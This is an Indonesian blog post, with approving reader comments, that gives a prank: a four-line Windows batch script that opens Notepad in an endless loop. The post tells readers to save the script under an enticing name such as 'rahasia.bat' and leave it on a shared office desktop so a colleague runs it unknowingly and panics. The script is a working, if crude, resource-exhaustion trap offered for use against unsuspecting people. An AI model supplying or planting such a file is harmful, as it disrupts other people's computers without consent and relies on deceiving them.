Notepad Terbuka Terus Menerus

Trik berikut ini hanya sekedar trik untuk iseng, lumayan buat ngerjain teman khususnya di kantor yang menggunakan komputer secara bersama-sama. Trik ini menggunakan kode pada notepad dan dijamin akan membuat korban panik (dengan catatan, korban belum tahu trik ini). Cara kerjanya adalah, ketika kode mulai bekerja maka notepad akan terbuka terus menerus tanpa bisa dihentikan.


Penasaran ingin tahu cara membuat jebakannya ?

Gampang. Pertama-tama copy kode di bawah ini

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


Setelah dicopy, paste pada notepad. Setelah itu silakan "save as" dengan nama apa saja tapi dengan menggunakan ekstensi ".bat". Saran saya, pilih nama file yang memancing orang penasaran untuk membukanya, seperti "rahasia.bat".

Sekarang copy file tersebut ke desktop agar mudah diakses oleh orang lain karena kode ini hanya bekerja jika diakses. Pada akhirnya siap-siaplah melihat wajah atau mungkin suara panik dari korban anda.

Satu hal yang perku anda ingat adalah bahwa ketika kode ini berjalan maka akan sangat sulit menghentikannya, sehingga sangat disarankan bagi anda yang ingin mencobanya sendiri, pastikan tak ada program lain yang sedang anda jalankan. Jangan khawatir, jika anda sudah puas ngerjain orang, anda bisa langsung menghapus file-nya.


Semoga Bermanfaat

Posting Lain Terkait Komputer

5 Komentar:

Desain Interior Lampung said...

Jebakan nih ya hehe

Nikball Rubber said...

waw... sip sip keren bisa di coba nih... hehe

sogi said...

@Desain & Nikball : hhhh.... jgn bilang, saya ajarin yaa...

Sewa Jas said...

Wah boleh jga tuh kwkwkw

sogi said...

@Sewa Jas : semoga saya gak dibawa2 kalo org dikerjain marah...hhh.. :)